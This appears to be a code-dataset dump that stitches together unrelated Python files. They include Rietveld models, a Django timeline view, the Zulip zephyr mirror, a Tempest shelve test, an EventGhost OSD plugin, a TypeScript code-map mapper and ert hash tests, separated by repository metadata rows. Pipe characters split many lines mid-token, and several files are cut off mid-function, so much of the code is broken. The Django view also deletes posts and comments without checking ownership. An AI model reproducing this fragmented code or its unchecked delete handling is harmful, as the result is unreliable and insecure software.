created = db.DateTimeProperty(auto_now_add=True)
modified = db.DateTimeProperty(auto_now=True)
n_comments = db.IntegerProperty(default=0)
def update_comment_count(self, n):
"""Increment the n_comments property by n."""
self.n_comments = self.num_comments + n
@property
def num_comments(self):
"""The number of non-draft comments for this issue.
This is almost an alias for self.n_comments, except that if
n_comments is None, 0 is returned.
"""
# For older patchsets n_comments is None.
return self.n_comments or 0
class Message(db.Model):
"""A copy of a message sent out in email.
This is a descendant of an Issue.
"""
issue = db.ReferenceProperty(Issue) # == parent
subject = db.StringProperty()
sender = db.EmailProperty()
recipients = db.ListProperty(db.Email)
date = db.DateTimeProperty(auto_now_add=True)
text = db.TextProperty()
draft = db.BooleanProperty(default=False)
in_reply_to = db.SelfReferenceProperty()
issue_was_closed = db.BooleanProperty(default=False)
_approval = None
_disapproval = None
def find(self, text):
"""Returns True when the message says text and is not written by the issue owner."""
# Must not be issue owner.
# Must contain text in a line that doesn't start with '>'.
return self.issue.owner.email() != self.sender and any(
True for line in self.text.lower().splitlines()
if not line.strip().startswith('>') and text in line)
@property
def approval(self):
"""Is True when the message represents an approval of the review."""
if self._approval is None:
self._approval = self.find('lgtm') and not self.find('not lgtm')
return self._approval
@property
def disapproval(self):
"""Is True when the message represents a disapproval of the review."""
if self._disapproval is None:
s |
corumcorp/redsentir | redsentir/lineatiempo/views.py | Python | gpl-3.0 | 2,842 | 0.017241 | # -*- coding: utf-8 -*-
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from .models import *
@login_required
def inicio(request):
if not request.user.perfil.es_joven and not request.user.is_superuser:
return redirect('mesa:inicio')
if request.POST :
if not 'publicacion' in request.POST or request.POST['publicacion']==None or request.POST['publicacion']=='':
imagenes = request.FILES.getlist('imagenes')
publicacion = Publicacion(contenido=request.POST['contenido'],usuario=request.user,num_img=len(imagenes))
publicacion.save()
for imagen in imagenes :
multiMedia = MultiMedia(publicacion=publicacion,archivo=imagen,tipo='imagen').save()
if 'video' in request.FILES :
video = MultiMedia(publicacion=publicacion,archivo=request.FILES['video'],tipo='video').save()
if 'audio' in request.FILES :
video = MultiMedia(publicacion=publicacion,archivo=request.FILES['audio'],tipo='video').save()
elif request.POST['accion'] == 'guardar_comentario':
comentario = ComentarioP(publicacion_id=request.POST['publicacion'],usuario = request.user)
if 'imagen_c' in request.FILES:
| comentario.imagen = request.FILES['imagen_c' | ]
if 'contenido' in request.POST :
comentario.contenido = request.POST['contenido']
comentario.save()
Publicacion.objects.filter(pk=comentario.publicacion_id).update(comentarios=(comentario.publicacion.comentarios+1))
elif 'accion' in request.POST and request.POST['accion']=='borrar':
publicacion = Publicacion.objects.get(pk=request.POST['publicacion'])
publicacion.delete()
elif 'accion' in request.POST and request.POST['accion']=='borrar_comentario':
comentario = ComentarioP.objects.get(pk=request.POST['comentario'])
comentario.delete()
Publicacion.objects.filter(pk=comentario.publicacion_id).update(comentarios=(comentario.publicacion.comentarios-1))
publicaciones = Publicacion.objects.all().order_by('id').reverse()[:50]
return render(request, 'sitio/lineatiempo/inicio.html',{'publicaciones':publicaciones})
@login_required
def meGustaP(request,pid):
publicacion = Publicacion.objects.get(pk=pid)
publicacion.me_gusta +=1
publicacion.save()
return redirect ('https://redsentir.org/lineatiempo/#publicacion_'+str(publicacion.pk))
@login_required
def meGustaCP(request,pid):
comentarioP = ComentarioP.objects.get(pk=pid)
comentarioP.me_gusta +=1
comentarioP.save()
return redirect ('https://redsentir.org/lineatiempo/#publicacion_'+str(comentarioP.publicacion_id))
|
andersonjonathan/Navitas | navitas/contact/models.py | Python | mit | 391 | 0 | f | rom django.db import models
from django.utils.translation import ugettext_lazy as _
class Contact(models.Model):
name = models.CharField(max_length=255, verbose_name=_("namn"))
email = models.EmailField(verbose_name=_("e-post"))
def __s | tr__(self):
return self.name
class Meta:
verbose_name = _("Kontaktval")
verbose_name_plural = _("Kontaktval")
|
samatdav/zulip | bots/zephyr_mirror_backend.py | Python | apache-2.0 | 48,314 | 0.002235 | #!/usr/bin/env python
# Copyright (C) 2012 Zulip, Inc.
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from typing import IO, Any, Text, Union, Set, Tuple
from types import FrameType
import sys
from six.moves import map
from six.moves import range
try:
import simplejson
except ImportError:
import json as simplejson # type: ignore
import re
import time
import subprocess
import optparse
import os
import datetime
import textwrap
import time
import signal
import logging
import hashlib
import tempfile
import select
DEFAULT_SITE = "https://api.zulip.com"
class States(object):
Startup, ZulipToZephyr, ZephyrToZulip, ChildSending = list(range(4))
CURRENT_STATE = States.Startup
logger = None # type: logging.Logger
def to_zulip_username(zephyr_username):
# type: (str) -> str
if "@" in zephyr_username:
(user, realm) = zephyr_username.split("@")
else:
(user, realm) = (zephyr_username, "ATHENA.MIT.EDU")
if realm.upper() == "ATHENA.MIT.EDU":
# Hack to make ctl's fake username setup work :)
if user.lower() == 'golem':
user = 'ctl'
return user.lower() + "@mit.edu"
return user.lower() + "|" + realm.upper() + "@mit.edu"
def to_zephyr_username(zulip_username):
# type: (str) -> str
(user, realm) = zulip_username.split("@")
if "|" not in user:
# Hack to make ctl's fake username setup work :)
if user.lower() == 'ctl':
user = 'golem'
return user.lower() + "@ATHENA.MIT.EDU"
match_user = re.match(r'([a-zA-Z0-9_]+)\|(.+)', user)
if not match_user:
raise Exception("Could not parse Zephyr realm for cross-realm user %s" % (zulip_username,))
return match_user.group(1).lower() + "@" + match_user.group(2).upper()
# Checks whether the pair of adjacent lines would have been
# linewrapped together, had they been intended to be parts of the same
# paragraph. Our check is whether if you move the first word on the
# 2nd line onto the first line, the resulting line is either (1)
# significantly shorter than the following line (which, if they were
# in the same paragraph, should have been wrapped in a way consistent
# with how the previous line was wrapped) or (2) shorter than 60
# characters (our assumed minimum linewrapping threshold for Zephyr)
# or (3) the first word of the next line is longer than this entire
# line.
def different_paragraph(line, next_line):
    # type: (str, str) -> bool
    """Heuristic: would these two adjacent lines NOT have been linewrapped
    together if they belonged to the same paragraph?

    True when joining the next line's first word onto *line* leaves it
    (1) much shorter than *next_line*, (2) under the assumed minimum
    wrap width, or (3) when that first word is longer than *line* itself.
    """
    first_word = next_line.split()[0]
    joined_len = len(line) + 1 + len(first_word)
    return (joined_len < len(next_line) * 0.8
            or joined_len < 50
            or len(line) < len(first_word))
# Linewrapping algorithm based on:
# http://gcbenison.wordpress.com/2011/07/03/a-program-to-intelligently-remove-carriage-returns-so-you-can-paste-text-without-having-it-look-awful/ #ignorelongline
def unwrap_lines(body):
    # type: (str) -> str
    """Re-flow hard-wrapped text: join lines that look like one paragraph,
    keep deliberate breaks, and separate paragraphs with blank lines so
    Markdown constructs (e.g. bulleted lists) render properly.
    """
    leading_punct = re.compile(r'^\W', flags=re.UNICODE)
    pieces = []
    lines = body.split("\n")
    previous_line = lines[0]
    for raw_line in lines[1:]:
        line = raw_line.rstrip()
        if leading_punct.match(line) and leading_punct.match(previous_line):
            # Both lines open with punctuation (e.g. list bullets):
            # keep the single line break.
            pieces.append(previous_line + "\n")
        elif (not line or not previous_line or
              leading_punct.match(line) or
              different_paragraph(previous_line, line)):
            # Use 2 newlines to separate sections so that we trigger
            # proper Markdown processing on things like bulleted lists.
            pieces.append(previous_line + "\n\n")
        else:
            # Same paragraph: undo the hard wrap.
            pieces.append(previous_line + " ")
        previous_line = line
    pieces.append(previous_line)
    return "".join(pieces)
def send_zulip(zeph):
    # type: (Dict[str, str]) -> Dict[str, str]
    """Translate one parsed zephyr notice dict into a Zulip message and send it.

    Returns the API result dict from the Zulip client (or a fake success
    result in test mode). Relies on the module globals `options` and
    `zulip_client` being initialized before the mirror loop runs.
    """
    message = {}
    if options.forward_class_messages:
        # Class mirroring sends on behalf of other users, so mark as forged.
        message["forged"] = "yes"
    message['type'] = zeph['type']
    message['time'] = zeph['time']
    message['sender'] = to_zulip_username(zeph['sender'])
    if "subject" in zeph:
        # Truncate the subject to the current limit in Zulip. No
        # need to do this for stream names, since we're only
        # subscribed to valid stream names.
        message["subject"] = zeph["subject"][:60]
    if zeph['type'] == 'stream':
        # Forward messages sent to -c foo -i bar to stream bar subject "instance"
        if zeph["stream"] == "message":
            message['to'] = zeph['subject'].lower()
            message['subject'] = "instance %s" % (zeph['subject'],)
        elif zeph["stream"] == "tabbott-test5":
            # Special-cased test class; mirrors the "message" handling above.
            message['to'] = zeph['subject'].lower()
            message['subject'] = "test instance %s" % (zeph['subject'],)
        else:
            message["to"] = zeph["stream"]
    else:
        message["to"] = zeph["recipient"]
    # Undo zephyr's hard linewrapping before sending.
    message['content'] = unwrap_lines(zeph['content'])
    if options.test_mode and options.site == DEFAULT_SITE:
        # In test mode against production, log instead of actually sending.
        logger.debug("Message is: %s" % (str(message),))
        return {'result': "success"}
    return zulip_client.send_message(message)
def send_error_zulip(error_msg):
    # type: (str) -> None
    """Report a mirroring problem to the bot's owner as a private Zulip message."""
    zulip_client.send_message({
        "type": "private",
        "sender": zulip_account_email,
        "to": zulip_account_email,
        "content": error_msg,
    })
current_zephyr_subs = set()  # classes we have confirmed subscriptions for
def zephyr_bulk_subscribe(subs):
    # type: (List[Tuple[str, str, str]]) -> None
    """Subscribe to a batch of zephyr (class, instance, recipient) triples,
    recording in current_zephyr_subs only the classes zephyr confirms.

    Fix: the final `else` branch was garbled in the source (stray '|' and
    lost indentation before current_zephyr_subs.add); restored so verified
    classes are actually recorded.
    """
    try:
        zephyr._z.subAll(subs)
    except IOError:
        # Since we haven't added the subscription to
        # current_zephyr_subs yet, we can just return (so that we'll
        # continue processing normal messages) and we'll end up
        # retrying the next time the bot checks its subscriptions are
        # up to date.
        logger.exception("Error subscribing to streams (will retry automatically):")
        logger.warning("Streams were: %s" % ([cls for cls, instance, recipient in subs],))
        return
    try:
        actual_zephyr_subs = [cls for (cls, _, _) in zephyr._z.getSubscriptions()]
    except IOError:
        logger.exception("Error getting current Zephyr subscriptions")
        # Don't add anything to current_zephyr_subs so that we'll
        # retry the next time we check for streams to subscribe to
        # (within 15 seconds).
        return
    for (cls, instance, recipient) in subs:
        if cls not in actual_zephyr_subs:
            logger.error("Zephyr failed to subscribe us to %s; will retry" % (cls,))
            try:
                # We'll retry automatically when we next check for
                # streams to subscribe to (within 15 seconds), but
                # it's worth doing 1 retry immediately to avoid
                # missing 15 seconds of messages on the affected
                # classes
                zephyr._z.sub(cls, instance, recipient)
            except IOError:
                pass
        else:
            current_zephyr_subs.add(cls)
def update_subscriptions():
# type: () -> None
try:
f = open(options.stream_file_path, "r")
public_streams = simplejson.loads(f.read())
f.clos |
varunarya10/tempest | tempest/scenario/test_shelve_instance.py | Python | apache-2.0 | 4,194 | 0 | # Copyright 2014 Scality
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log
import testtools
from tempest.common import waiters
from tempest import config
from tempest.scenario import manager
from tempest import test
CONF = config.CONF
LOG = log.getLogger(__name__)
class TestShelveInstance(manager.ScenarioTest):
    """
    This test shelves then unshelves a Nova instance
    The following is the scenario outline:
    * boot an instance and create a timestamp file in it
    * shelve the instance
    * unshelve the instance
    * check the existence of the timestamp file in the unshelved instance
    """
    def _write_timestamp(self, server_or_ip):
        # 'sync' forces the marker to disk so it survives the snapshot
        # that shelving takes.
        ssh_client = self.get_remote_client(server_or_ip)
        ssh_client.exec_command('date > /tmp/timestamp; sync')
        self.timestamp = ssh_client.exec_command('cat /tmp/timestamp')
    def _check_timestamp(self, server_or_ip):
        # The timestamp must be identical to what was written before the
        # shelve, proving the unshelved guest came from the snapshot.
        ssh_client = self.get_remote_client(server_or_ip)
        got_timestamp = ssh_client.exec_command('cat /tmp/timestamp')
        self.assertEqual(self.timestamp, got_timestamp)
    def _shelve_then_unshelve_server(self, server):
        self.servers_client.shelve_server(server['id'])
        offload_time = CONF.compute.shelved_offload_time
        if offload_time >= 0:
            # Nova offloads automatically after the configured delay.
            waiters.wait_for_server_status(self.servers_client, server['id'],
                                           'SHELVED_OFFLOADED',
                                           extra_timeout=offload_time)
        else:
            # Auto-offload disabled: trigger the offload explicitly.
            waiters.wait_for_server_status(self.servers_client,
                                           server['id'], 'SHELVED')
            self.servers_client.shelve_offload_server(server['id'])
            waiters.wait_for_server_status(self.servers_client, server['id'],
                                           'SHELVED_OFFLOADED')
        self.servers_client.unshelve_server(server['id'])
        waiters.wait_for_server_status(self.servers_client, server['id'],
                                       'ACTIVE')
    # Fix: the idempotent_id string and the create_kwargs assignment below
    # were garbled by stray '|' characters in the source.
    @test.idempotent_id('1164e700-0af0-4a4c-8792-35909a88743c')
    @testtools.skipUnless(CONF.compute_feature_enabled.shelve,
                          'Shelve is not available.')
    @test.services('compute', 'network', 'image')
    def test_shelve_instance(self):
        self.keypair = self.create_keypair()
        self.security_group = self._create_security_group()
        security_groups = [{'name': self.security_group['name']}]
        create_kwargs = {
            'key_name': self.keypair['name'],
            'security_groups': security_groups
        }
        server = self.create_server(image=CONF.compute.image_ref,
                                    create_kwargs=create_kwargs)
        if CONF.compute.use_floatingip_for_ssh:
            floating_ip = self.floating_ips_client.create_floating_ip()
            self.addCleanup(self.delete_wrapper,
                            self.floating_ips_client.delete_floating_ip,
                            floating_ip['id'])
            self.floating_ips_client.associate_floating_ip_to_server(
                floating_ip['ip'], server['id'])
            self._write_timestamp(floating_ip['ip'])
        else:
            self._write_timestamp(server)
        # Prevent bug #1257594 from coming back
        # Unshelve used to boot the instance with the original image, not
        # with the instance snapshot
        self._shelve_then_unshelve_server(server)
        if CONF.compute.use_floatingip_for_ssh:
            self._check_timestamp(floating_ip['ip'])
        else:
            self._check_timestamp(server)
|
tfroehlich82/EventGhost | plugins/EventGhost/ShowOSD.py | Python | gpl-2.0 | 17,182 | 0 | # -*- coding: utf-8 -*-
#
# This file is part of EventGhost.
# Copyright © 2005-2020 EventGhost Project <http://www.eventghost.net/>
#
# EventGhost is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 2 of the License, or (at your option)
# any later version.
#
# EventGhost is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along
# with EventGhost. If not, see <http://www.gnu.org/licenses/>.
import threading
from os import listdir
from os.path import abspath, dirname, join
import wx
import eg
from eg.WinApi.Dynamic import (
CreateEvent,
SetEvent,
SetWindowPos,
SWP_FRAMECHANGED,
SWP_HIDEWINDOW,
SWP_NOACTIVATE,
SWP_NOOWNERZORDER,
SWP_SHOWWINDOW,
)
from eg.WinApi.Utils import GetMonitorDimensions
# SetWindowPos flags used when showing/hiding the OSD window.
HWND_FLAGS = SWP_NOACTIVATE | SWP_NOOWNERZORDER | SWP_FRAMECHANGED
# Directory holding the optional OSD skin modules.
SKIN_DIR = join(
    abspath(dirname(__file__.decode('mbcs'))),
    "OsdSkins"
)
# Available skin names: the skin module file names without ".py".
SKINS = [name[:-3] for name in listdir(SKIN_DIR) if name.endswith(".py")]
SKINS.sort()
# Native description string of the default 18pt bold swiss font.
DEFAULT_FONT_INFO = wx.Font(
    18,
    wx.SWISS,
    wx.NORMAL,
    wx.BOLD
).GetNativeFontInfoDesc()
class ShowOSD(eg.ActionBase):
    """EventGhost action that shows a simple On Screen Display message
    on a shared, module-wide OSDFrame window.
    """
    name = "Show OSD"
    description = "Shows a simple On Screen Display."
    iconFile = "icons/ShowOSD"
    class text:
        # User-visible strings for the configuration dialog.
        label = "Show OSD: %s"
        editText = "Text to display:"
        osdFont = "Text Font:"
        osdColour = "Text Colour:"
        outlineFont = "Outline OSD"
        alignment = "Alignment:"
        alignmentChoices = [
            "Top Left",
            "Top Right",
            "Bottom Left",
            "Bottom Right",
            "Screen Center",
            "Bottom Center",
            "Top Center",
            "Left Center",
            "Right Center",
        ]
        display = "Show on display:"
        xOffset = "Horizontal offset X:"
        yOffset = "Vertical offset Y:"
        wait1 = "Autohide OSD after"
        wait2 = "seconds (0 = never)"
        skin = "Use skin"
    def __call__(
        self,
        osdText="",
        fontInfo=None,
        foregroundColour=(255, 255, 255),
        backgroundColour=(0, 0, 0),
        alignment=0,
        offset=(0, 0),
        displayNumber=0,
        timeout=3.0,
        skin=None
    ):
        """Display *osdText* on the shared OSD frame.

        The actual drawing is marshalled to the wx GUI thread via
        wx.CallAfter; a Win32 event object blocks the action thread
        until the frame reports it has been updated.
        """
        # Older configurations stored skin as a bool; map it to a
        # skin name (first available) or None.
        if isinstance(skin, bool):
            skin = SKINS[0] if skin else None
        self.osdFrame.timer.cancel()
        osdText = eg.ParseString(osdText)
        event = CreateEvent(None, 0, 0, None)
        wx.CallAfter(
            self.osdFrame.ShowOSD,
            osdText,
            fontInfo,
            foregroundColour,
            backgroundColour,
            alignment,
            offset,
            displayNumber,
            timeout,
            event,
            skin
        )
        eg.actionThread.WaitOnEvent(event)
    def Configure(
        self,
        osdText="",
        fontInfo=None,
        foregroundColour=(255, 255, 255),
        backgroundColour=(0, 0, 0),
        alignment=0,
        offset=(0, 0),
        displayNumber=0,
        timeout=3.0,
        skin=None,
    ):
        """Build the configuration dialog and store the chosen settings."""
        # Same bool -> skin-name migration as in __call__.
        if isinstance(skin, bool):
            skin = SKINS[0] if skin else None
        if fontInfo is None:
            fontInfo = DEFAULT_FONT_INFO
        panel = eg.ConfigPanel()
        text = self.text
        # Create with a two-line dummy value first so GetBestSize yields
        # a sensible multi-line height, then set the real text.
        editTextCtrl = panel.TextCtrl("\n\n", style=wx.TE_MULTILINE)
        height = editTextCtrl.GetBestSize()[1]
        editTextCtrl.ChangeValue(osdText)
        editTextCtrl.SetMinSize((-1, height))
        alignmentChoice = panel.Choice(
            alignment, choices=text.alignmentChoices
        )
        displayChoice = eg.DisplayChoice(panel, displayNumber)
        xOffsetCtrl = panel.SpinIntCtrl(offset[0], -32000, 32000)
        yOffsetCtrl = panel.SpinIntCtrl(offset[1], -32000, 32000)
        timeCtrl = panel.SpinNumCtrl(timeout)
        fontButton = panel.FontSelectButton(fontInfo)
        foregroundColourButton = panel.ColourSelectButton(foregroundColour)
        # backgroundColour is None when the outline option is off; the
        # colour button still needs a concrete colour to display.
        if backgroundColour is None:
            tmpColour = (0, 0, 0)
        else:
            tmpColour = backgroundColour
        outlineCheckBox = panel.CheckBox(
            backgroundColour is not None, text.outlineFont
        )
        backgroundColourButton = panel.ColourSelectButton(tmpColour)
        backgroundColourButton.Enable(backgroundColour is not None)
        useSkin = skin is not None
        skinCtrl = panel.CheckBox(useSkin, text.skin)
        skinCtrl.SetValue(useSkin)
        skinChc = panel.Choice(SKINS.index(skin) if skin else 0, SKINS)
        skinChc.Enable(useSkin)
        # Lay out the dialog: text box on top, text options on the right,
        # placement options on the left.
        sizer = wx.GridBagSizer(5, 5)
        expand = wx.EXPAND
        align = wx.ALIGN_CENTER_VERTICAL
        sizer.AddMany([
            (panel.StaticText(text.editText), (0, 0), (1, 1), align),
            (editTextCtrl, (0, 1), (1, 4), expand),
            (panel.StaticText(text.osdFont), (1, 3), (1, 1), align),
            (fontButton, (1, 4)),
            (panel.StaticText(text.osdColour), (2, 3), (1, 1), align),
            (foregroundColourButton, (2, 4)),
            (outlineCheckBox, (3, 3), (1, 1), expand),
            (backgroundColourButton, (3, 4)),
            (skinCtrl, (4, 3)),
            (skinChc, (4, 4), (1, 1), expand),
            (panel.StaticText(text.alignment), (1, 0), (1, 1), align),
            (alignmentChoice, (1, 1), (1, 1), expand),
            (panel.StaticText(text.display), (2, 0), (1, 1), align),
            (displayChoice, (2, 1), (1, 1), expand),
            (panel.StaticText(text.xOffset), (3, 0), (1, 1), align),
            (xOffsetCtrl, (3, 1), (1, 1), expand),
            (panel.StaticText(text.yOffset), (4, 0), (1, 1), align),
            (yOffsetCtrl, (4, 1), (1, 1), expand),
            (panel.StaticText(text.wait1), (5, 0), (1, 1), align),
            (timeCtrl, (5, 1), (1, 1), expand),
            (panel.StaticText(text.wait2), (5, 2), (1, 3), align),
        ])
        sizer.AddGrowableCol(2)
        panel.sizer.Add(sizer, 1, wx.EXPAND)
        def OnCheckBoxBGColour(event):
            # Outline colour only selectable while outlining is enabled.
            backgroundColourButton.Enable(outlineCheckBox.IsChecked())
            event.Skip()
        outlineCheckBox.Bind(wx.EVT_CHECKBOX, OnCheckBoxBGColour)
        def OnCheckBoxSkin(event):
            # Skin choice only selectable while skinning is enabled.
            skinChc.Enable(skinCtrl.IsChecked())
            event.Skip()
        skinCtrl.Bind(wx.EVT_CHECKBOX, OnCheckBoxSkin)
        while panel.Affirmed():
            if outlineCheckBox.IsChecked():
                outlineColour = backgroundColourButton.GetValue()
            else:
                # None encodes "no outline" in the stored settings.
                outlineColour = None
            if skinCtrl.IsChecked():
                skin = skinChc.GetStringSelection()
            else:
                skin = None
            panel.SetResult(
                editTextCtrl.GetValue(),
                fontButton.GetValue(),
                foregroundColourButton.GetValue(),
                outlineColour,
                alignmentChoice.GetValue(),
                (xOffsetCtrl.GetValue(), yOffsetCtrl.GetValue()),
                displayChoice.GetValue(),
                timeCtrl.GetValue(),
                skin
            )
    def GetLabel(self, osdText, *dummyArgs):
        # Show the OSD text on one line in the tree (escape real newlines).
        return self.text.label % osdText.replace("\n", r"\n")
    @classmethod
    def OnAddAction(cls):
        """Create the shared OSD frame the first time this action is added."""
        def MakeOSD():
            cls.osdFrame = OSDFrame(None)
        def CloseOSD():
            cls.osdFrame.timer.cancel()
            cls.osdFrame.Close()
        eg.app.onExitFuncs.append(CloseOSD)
        # Frame creation must happen on the wx GUI thread.
        wx.CallAfter(MakeOSD)
    @eg.LogIt
    def OnClose(self):
        # NOTE(review): only drops the reference; actual frame shutdown is
        # handled by the onExitFuncs hook registered in OnAddAction.
        # self.osdFrame.timer.cancel()
        # wx.CallAfter(self.osdFrame.Close)
        self.osdFrame = None
class OSDFrame(wx.Frame):
"""
A shaped frame to display the OSD.
"""
@eg.LogIt
def __init__(self, parent):
|
oleg-shilo/sublime-codemap | custom_mappers/ts.py | Python | mit | 5,302 | 0.004715 | # Custom mapper sample for CodeMap plugin
# This script defines a mandatory `def generate(file)` and module attribute map_syntax:
# - `def generate(file)`
# The routine analyses the file content and produces the 'code map' representing the content structure.
# In this case it builds the list of sections (lines that start with `#` character) in the py file.
#
# - `map_syntax`
# Optional attribute that defines syntax highlight to be used for the code map text
#
# The map format: <item title>:<item position in source code>
#
# You may need to restart Sublime Text to reload the mapper
import codecs
import sublime
try:
installed = sublime.load_settings('Package Control.sublime-settings').get('installed_packages')
except:
installed = []
# `map_syntax` is a syntax highlighting that will be applied to CodeMap at runtime
# you can set it to the custom or built-in language definitions
if 'TypeScript' in installed:
map_syntax = 'Packages/TypeScript/TypeScript.tmLanguage'
else:
# fallback as TypeScript is not installed
map_syntax = 'Packages/Python/Python.tmLanguage'
def generate(file):
    """CodeMap entry point: build the code-map text for *file* (a path).

    Note: the parameter name shadows the Python 2 builtin ``file``; kept
    for compatibility with the CodeMap mapper interface.
    """
    return ts_mapper.generate(file)
class ts_mapper():
    """Builds the CodeMap outline for a TypeScript source file.

    Each emitted line has the form '<padded title> :<line number>'.
    Fixes: two lines garbled by stray '|' characters in the source
    (the `if content_type != last_type:` guard and `content[indent:]`),
    plus the local name `map` shadowing the builtin.
    """
    # -----------------
    def generate(file):
        """Parse *file* and return the formatted code-map string.

        Defined without `self` on purpose: it is invoked as
        ts_mapper.generate(path), i.e. as a plain function (Python 3).
        """
        def str_of(count, char):
            # Build a string of `count` repetitions of `char`.
            text = ''
            for i in range(count):
                text = text + char
            return text
        # Parse
        item_max_length = 0
        members = []
        try:
            with codecs.open(file, "r", encoding='utf8') as f:
                lines = f.read().split('\n')
                line_num = 0
                last_type = ''
                last_indent = 0
                for line in lines:
                    line = line.replace('\t', ' ')
                    line_num = line_num + 1
                    code_line = line.lstrip()
                    info = None
                    indent_level = len(line) - len(code_line)
                    def parse_as_class(keyword, line):
                        # Match 'keyword Name ...' or 'export keyword Name ...'.
                        # Returns an (line, kind, title, indent) tuple or
                        # falls through to None when the line doesn't match.
                        # NOTE(review): the last_type/last_indent assignments
                        # below rebind locals of this nested function only;
                        # they never update the enclosing loop's state.
                        if code_line.startswith(keyword+' ') or code_line.startswith('export '+keyword+' '):
                            last_type = keyword
                            last_indent = indent_level
                            if code_line.startswith('export '+keyword+' '):
                                line = line.replace('export '+keyword+' ', keyword+' ')
                            display_line = line.rpartition('implements')[0]
                            if not display_line:
                                display_line = line.rpartition('{')[0]
                            if not display_line:
                                display_line = line.rstrip()
                            # class CSScriptHoverProvider implements HoverProvider {
                            info = (line_num,
                                    keyword,
                                    display_line.split('(')[0].split(':')[0].rstrip()+' {}',  # suffix brackets make it valid TS syntax
                                    indent_level)
                            return info
                    info = parse_as_class('class', line)
                    if not info:
                        info = parse_as_class('interface', line)
                    if info:
                        pass
                    elif code_line.startswith('function ') or code_line.startswith('export function '):
                        if last_type == 'function' and indent_level > last_indent:
                            continue  # private class functions
                        last_type = 'function'
                        last_indent = indent_level
                        info = (line_num,
                                'function',
                                line.split('(')[0].rstrip()+'()',
                                indent_level)
                    elif code_line.startswith('public '):
                        last_type = 'public '
                        last_indent = indent_level
                        info = (line_num,
                                'public ',
                                line.replace('public ', '').split('(')[0].rstrip()+'()',
                                indent_level)
                    if info:
                        length = len(info[2])
                        if item_max_length < length:
                            item_max_length = length
                        members.append(info)
        except Exception as err:
            print('CodeMap-py:', err)
            members.clear()
        # Format: pad every title to the longest one, insert blank lines
        # between groups of different kinds or before top-level types.
        outline = ''
        last_indent = 0
        last_type = ''
        for line, content_type, content, indent in members:
            extra_line = ''
            if indent == last_indent:
                if content_type != last_type:
                    extra_line = '\n'
            elif content_type == 'class' or content_type == 'interface':
                extra_line = '\n'
            preffix = str_of(indent, ' ')
            lean_content = content[indent:]
            suffix = str_of(item_max_length-len(content), ' ')
            outline = outline + extra_line + preffix + lean_content + suffix + ' :' + str(line) + '\n'
            last_indent = indent
            last_type = content_type
        return outline
arielalmendral/ert | python/tests/core/util/test_hash.py | Python | gpl-3.0 | 1,507 | 0 | from ctypes import c_void_p
from ert.test import ExtendedTestCase
from ert.util import Hash, StringHash, DoubleHash, IntegerHash
class HashTest(ExtendedTestCase):
    """Sanity checks for the typed hash wrappers exposed by ert.util.

    Fixes: two lines garbled by stray '|' characters in the source (the
    KeyError context manager and the `table["two"] = 2` assignment), and
    locals renamed from `hash` to avoid shadowing the builtin.
    """
    def test_string_hash(self):
        table = StringHash()
        self.assertEqual(len(table), 0)
        table["hipp"] = ""
        self.assertEqual(len(table), 1)
        # Non-string values are rejected.
        with self.assertRaises(ValueError):
            table["hopp"] = 55
        # Missing keys raise KeyError on lookup.
        with self.assertRaises(KeyError):
            table["hopp"]
        self.assertTrue("hipp" in table)
        self.assertEqual(list(table.keys()), ["hipp"])
    def test_int_hash(self):
        table = IntegerHash()
        with self.assertRaises(ValueError):
            table["one"] = "ein"
        with self.assertRaises(ValueError):
            table["one"] = 1.0
        table["two"] = 2
        self.assertEqual(table["two"], 2)
    def test_double_hash(self):
        table = DoubleHash()
        with self.assertRaises(ValueError):
            table["one"] = "ein"
        # Ints are accepted and coerced for a double hash.
        table["two"] = 2
        table["three"] = 3.0
        self.assertEqual(table["two"], 2)
        self.assertEqual(table["three"], 3.0)
    def test_c_void_p_hash(self):
        table = Hash()
        cp = c_void_p(512)
        table["1"] = cp
        # Stored pointers compare equal to their integer value.
        self.assertEqual(table["1"], cp.value)
    def test_for_in_hash(self):
        table = StringHash()
        table["one"] = "one"
        table["two"] = "two"
        table["three"] = "three"
        for key in table:
            self.assertTrue(key in table)
linkleonard/lib-python | outbound/__init__.py | Python | mit | 12,217 | 0.003765 | import sys
import json
from numbers import Number
import time
import requests
import version
__BASE_URL = "https://api.outbound.io/v2"
# Reference to this module itself so init() can stash state on it via setattr.
this = sys.modules[__name__]
# Error codes handed to on_error callbacks.
ERROR_INIT = 1
ERROR_USER_ID = 2
ERROR_EVENT_NAME = 3
ERROR_CONNECTION = 4
ERROR_UNKNOWN = 5
ERROR_TOKEN = 6
# Push-notification platform identifiers.
APNS = "apns"
GCM = "gcm"
def init(key):
    """Record the Outbound API key and the standard request headers.

    Must be called before any other API function; the headers are stored
    on this module itself (see the `this` module global).
    """
    headers = {
        'content-type': 'application/json',
        'X-Outbound-Client': 'Python/{0}'.format(version.VERSION),
        'X-Outbound-Key': key,
    }
